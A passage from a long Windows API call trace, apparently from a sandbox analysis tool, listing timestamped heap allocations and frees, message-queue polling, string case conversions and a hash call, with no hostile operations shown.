(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.790] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.790] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.791] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.791] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.791] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.791] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.792] CryptHashData (hHash=0xaa57a0, pbData=0x24b18e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.796] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.798] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.799] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0252.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0252.799] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.800] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.800] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.803] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.803] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.804] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 